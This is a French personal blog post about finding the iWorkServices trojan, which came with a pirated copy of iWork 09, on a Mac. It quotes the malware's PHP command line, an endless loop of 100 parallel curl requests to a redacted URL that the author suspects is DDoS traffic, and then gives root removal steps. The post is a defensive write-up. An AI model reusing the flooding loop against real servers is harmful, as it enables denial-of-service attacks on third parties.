Il y'a quelque jours, un processus php mangeait tout mon CPU durant la nuit. Je me suis levé et j'ai killé ces derniers sans vraiment m'en préoccuper. J'ai fait des recherches rapides sur Google car le code était douteux :

php -r while(1){
  $mh = curl_multi_init(); $ch = array();
  for($i = 0; $i < 100; $i++){
    $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, "http://...");
    curl_setopt($ch[$i], CURLOPT_HEADER, 0);
    curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
    curl_multi_add_handle($mh, $ch[$i]);
  }
  do{ curl_multi_exec($mh, $running); }
  while($running > 0);
  for($i = 0; $i < 100; $i++){ curl_multi_remove_handle($mh, $ch[$i]); }
  curl_multi_close($mh);
}

Et hier, j'ai lu sur MacBidouille que ces petits malins étaient issus d'un Trojan venu avec une version pirate de iWork 09'.

Heurement, le processus pour supprimer le malveillant est assez simple : 1) (open Terminal.app) 2) sudo su (enter password) 3) rm -r /System/Library/StartupItems/iWorkServices 4) rm /private/tmp/.iWorkServices 5) rm /usr/bin/iWorkServices 6) rm -r /Library/Receipts/iWorkServices.pkg 7) killall -9 iWorkServices

La place de l'étape 7 est discutable mais visiblement le trojan est assez stupide et ce n'est donc pas un problème. Il ne cherche pas à se recréer quelque part où ce genre de méchanismes de "protection".

Beaucoup de personne conseils de réinstaller Mac OS X par mesure de sécurité, n'ayant pas cet option en Corée, je vais attendre de voir si ce programme est plus vicieux qu'au premier abord mais je ne pense vraiment pas qu'il était destiné à autre chose qu'à des attaques DDoS.

Ca me fera une bonne leçon à l'avenir !

Edit : Pour vérifier si vous avez le trojan, regardez si le dossier "/System/Library/StartupItems/iWorkServices/" existe. Si oui, vous savez ce qu'il vous reste à faire !